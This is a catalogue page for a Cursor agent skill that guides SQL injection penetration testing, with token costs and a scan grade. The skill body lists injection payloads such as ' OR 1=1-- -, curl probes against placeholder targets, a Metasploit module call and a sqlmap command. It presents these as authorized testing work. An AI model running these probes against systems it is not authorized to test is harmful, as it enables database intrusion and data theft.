metasploit-cursor-harness: Skill for Cursor

.cursor/skills/sqli-pentest/SKILL.md

sqli-pentest is a skill for Cursor from Suzu-Testing/metasploit-cursor-harness. It costs 52 tokens per session (2,629 once invoked), scanned A, original, MIT.

A guide for testing SQL injection, a vulnerability where input changes the database query made by an application. It covers web requests, database-specific tests, bypass methods, and sqlmap automation.

In plain words
What is it for?
Mapping possible injection points, identifying the injection type and database system, testing search or login inputs, checking blind or error-based behavior, extracting limited evidence, and documenting results.
Why use it?
It provides a process for finding and confirming unsafe handling of parameters, headers, cookies, and JSON fields. Testing is framed for authorized targets and begins with low-impact probes.

Token cost

What it costs to keep this loaded

Counted locally with the o200k_base tokenizer, which is exact for GPT models; Claude uses its own tokenizer and its counts differ. Treat this as one consistent yardstick across the catalogue rather than a bill. Prices are per million input tokens.

ModelPer sessionOnce invoked
Fable 5.1 $0.00052 $0.02629
Opus 5 $0.00026 $0.01314
Sonnet 5 $0.00010 $0.00526
Haiku 4.5 $0.00005 $0.00263

Security

Grade A, and why

sqli-pentest scanned grade A with 1 finding against 26 rules in 11 categories — prompt injection, anti-refusal, data exfiltration, privilege escalation, supply chain, agent snooping, system-prompt leakage, SSRF and excessive agency — measured 9d ago.

A static scan of the body, not an audit. Every finding is printed with the line that produced it so you can judge whether it matters here. A mod is markdown that instructs an agent; that is exactly why what it instructs is worth reading.

SQL Injection Pentest

Prerequisites

  • Target is in scope (scope/scope-master.txt, engagement ROE).
  • Load web-app-pentest for overall web testing context.
  • After confirmed DB access, load database-pentest for post-exploitation enumeration.

Triggers

  • SQL syntax errors, ODBC/JDBC messages, or DBMS version strings in responses
  • Single quote (') or double quote breaks page behavior or changes result count
  • Numeric parameters accept arithmetic (1, 2-1, 1 OR 1=1) with different output
  • Search, filter, sort, pagination params (id, cat, order, limit)
  • Login forms, cookies, headers, JSON fields concatenated into queries
  • Second-order symptoms: stored input triggers SQL errors on a later page

Workflow

Task Progress:
- [ ] Map injection points (params, headers, cookies, JSON, ORM layers)
- [ ] Confirm injection type: error, boolean blind, time blind, union, stacked
- [ ] Identify DBMS (keywords, errors, timing functions)
- [ ] Test with low-impact probes, escalate to data extraction
- [ ] Document with request/response evidence and extracted data samples

Detection

Error-based probes

CLI (primary for web vulns):

# Manual probes in Burp Repeater or curl
curl -s "http://<target>/search?id=1'"
curl -s "http://<target>/search?id=1' AND 1=2-- -"

Payloads: ' OR 1=1-- -, " OR "1"="1, ' AND 1=2-- -

MSF MCP:

  module_name="auxiliary/scanner/http/blind_sql_query",
  engagement_id="<id>",
  options={"RHOSTS": "<target>", "TARGETURI": "/search", "QUERY": "id=1'", "METHOD": "GET"}
)

Boolean blind

CLI (primary):

sqlmap -u "http://<target>/search?id=1" --technique=B --batch --level=3

Payloads: ' AND 1=1-- -, ' AND 1=2-- -, 1 AND 1=1, 1 AND 1=2

What this file has done since we first saw it

Hashed on every crawl. A supply-chain change to an agent config is a question of when, not whether, so the history is kept rather than the latest state alone.

sqli-pentest is a skill published in the GitHub repository Suzu-Testing/metasploit-cursor-harness (3 stars, last pushed 15d ago), licensed MIT. It adds 52 tokens to every session and 2,629 once invoked, about $0.0003 per session on Opus 5. A static security scan graded it A with 1 finding (makes network calls). No closer match exists in the catalogue, so it is treated as the original; first seen 2026-08-31.
